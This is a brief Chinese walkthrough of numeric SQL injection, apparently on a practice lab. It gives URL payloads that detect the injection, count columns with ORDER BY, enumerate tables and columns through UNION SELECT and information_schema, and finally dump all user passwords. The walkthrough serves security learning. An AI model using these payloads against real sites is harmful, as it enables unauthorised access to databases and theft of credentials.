1、判断是什么类型注入
?id=1 显示正常
?id=1' 报错
?id=1# 显示正常
?id=1'# 报错
可以知道这里是数字型注入
2、查询有多少列
?id=1 and 1=2 order by 3# 没有报错
?id=1 and 1=2 order by 4# 报错
说明有3列
3、查询数据库名
?id=1 and 1=2 union select 1,database(),3#
4、查询表名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
5、查users表中的字段名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)
?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
6、查询字段中的值
?id=1 and 1=2 union select 1,2,group_concat(password) from security.users--+